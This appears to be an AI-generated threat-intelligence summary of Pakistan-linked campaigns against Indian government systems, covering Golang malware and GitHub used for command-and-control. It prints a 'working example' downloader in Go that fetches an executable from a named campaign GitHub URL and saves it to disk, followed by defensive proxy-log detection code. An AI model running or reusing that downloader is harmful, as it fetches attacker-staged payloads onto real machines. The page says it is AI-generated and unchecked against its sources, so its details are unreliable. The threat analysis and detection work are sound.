Pakistan-Linked Hackers Target Indian Government with Novel Golang Malware
These articles are AI-generated summaries. Please check the original sources for full details.
Pakistan-Linked Cyber Campaigns Target Indian Government Entities
Indian government entities have been the target of two campaigns, dubbed “Gopher Strike” and “Sheet Attack,” originating from a Pakistan-linked actor, employing previously undocumented techniques. Zscaler ThreatLabz identified these campaigns in September 2025, noting potential ties to, but also distinctions from, the known APT36 group.
Rather than isolated incidents, these campaigns demonstrate a coordinated effort to bypass security measures and establish persistent access, highlighting the increasing sophistication of nation-state actors. A compromise of government entities at this scale could lead to significant data exfiltration and disruption of critical services, representing a major national security risk.
Key Insights
- Gopher Strike & Sheet Attack identified, 2025: Two distinct campaigns discovered by Zscaler researchers targeting Indian government systems.
- Golang Malware: Use of Golang to build the GOGITTER downloader and the GITSHELLPAD backdoor. This suggests a shift toward Golang for its cross-platform capabilities and evasion potential.
- GitHub as C2: Leveraged GitHub's infrastructure for command-and-control (C2), using private repositories to stage malicious payloads and exfiltrate data, circumventing traditional security monitoring because the traffic goes to a trusted domain.
Working Example
// Simplified illustration of GOGITTER's downloader behaviour (Golang)
package main

import (
	"fmt"
	"io"
	"net/http"
	"os"
)

func main() {
	// Raw-file URL on the GitHub repository the campaign used for staging
	githubRepoURL := "https://github.com/jaishankai/sockv6/raw/main/edgehost.exe"
	// Download the executable; http.Get sends Go's default User-Agent, "Go-http-client/1.1"
	resp, err := http.Get(githubRepoURL)
	if err != nil {
		fmt.Println("Error downloading file:", err)
		return
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		fmt.Println("Error reading response body:", err)
		return
	}
	// Save the payload to disk in the working directory
	err = os.WriteFile("edgehost.exe", body, 0644)
	if err != nil {
		fmt.Println("Error writing file:", err)
		return
	}
	fmt.Println("File downloaded and saved as edgehost.exe")
}
Practical Applications
- Government Agencies: Filter inbound traffic more strictly, in particular ISO image downloads, and monitor scheduled-task creation, to prevent initial access.
- Pitfall: Over-reliance on signature-based detection; Golang binaries and dynamically generated payloads easily bypass traditional AV solutions, necessitating behavioral analysis.
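The GitHub-as-C2 insight above and the behavioral-analysis point in this list both come down to spotting payload fetches that hide behind a trusted domain. The following Go program is an added example, not code from the article or from Zscaler: it inspects proxy records for two signals visible in the downloader snippet, a raw GitHub URL ending in an executable extension and Go's default net/http User-Agent. The tab-separated log format and the sample lines are constructed for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)
// File types a raw GitHub download to a workstation should rarely carry.
var suspiciousSuffixes = []string{".exe", ".dll", ".iso", ".lnk", ".ps1"}
// InspectRequest returns why a proxied request looks like a GitHub-hosted payload fetch: a raw GitHub
// file with an executable suffix, and/or Go's default User-Agent ("Go-http-client/1.1"), which no browser sends.
func InspectRequest(rawURL, userAgent string) []string {
	var reasons []string
	u, err := url.Parse(rawURL)
	if err != nil {
		return reasons
	}
	host, path := strings.ToLower(u.Hostname()), strings.ToLower(u.Path)
	rawGitHub := host == "raw.githubusercontent.com" || (host == "github.com" && strings.Contains(path, "/raw/"))
	for _, s := range suspiciousSuffixes {
		if rawGitHub && strings.HasSuffix(path, s) {
			reasons = append(reasons, "executable from GitHub raw content")
			break
		}
	}
	if strings.HasPrefix(userAgent, "Go-http-client/") {
		reasons = append(reasons, "Go default User-Agent")
	}
	return reasons
}
// ScanProxyLog reads tab-separated "client<TAB>url<TAB>user-agent" lines (a constructed
// format) and maps each flagged client to its reasons; malformed lines are skipped.
func ScanProxyLog(lines []string) map[string][]string {
	hits := map[string][]string{}
	for _, line := range lines {
		if f := strings.Split(line, "\t"); len(f) == 3 {
			if r := InspectRequest(f[1], f[2]); len(r) > 0 {
				hits[f[0]] = append(hits[f[0]], r...)
			}
		}
	}
	return hits
}
func main() { // constructed sample; the first URL mirrors the article's downloader snippet
	fmt.Println(ScanProxyLog([]string{
		"10.0.5.21\thttps://github.com/jaishankai/sockv6/raw/main/edgehost.exe\tGo-http-client/1.1",
		"10.0.5.22\thttps://github.com/golang/go/blob/master/README.md\tMozilla/5.0",
	}))
}
```

Either signal alone is worth a triage ticket; both together on a government workstation are a strong indicator of a staged download rather than developer activity.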